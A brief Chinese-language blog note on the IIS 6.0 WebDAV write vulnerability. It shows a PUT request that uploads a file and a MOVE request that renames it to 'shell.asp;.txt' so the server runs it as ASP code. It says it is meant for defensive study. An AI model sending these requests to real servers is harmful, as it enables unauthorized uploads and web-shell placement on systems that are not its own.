【笔记】IIS写入漏洞

发表于 更新于 阅读次数:

前言

如果IIS6.0开启了写权限,且开启了WebDAV功能,利用写入漏洞上传文件

本文仅用于网络信息防御学习

上传文件

request
1
2
3
4
PUT /test.txt HTTP/1.1
Host: 127.0.0.1

GIF89a

修改文件位置

  • 如果IIS中的文件名或目录名中出现.asp;关键字,则在访问时会被当作代码执行
request
1
2
3
MOVE /test.txt HTTP/1.1
Host: 127.0.0.1
Destination: http://127.0.0.1/shell.asp;.txt

完成

参考文献

哔哩哔哩——逆风微笑的代码狗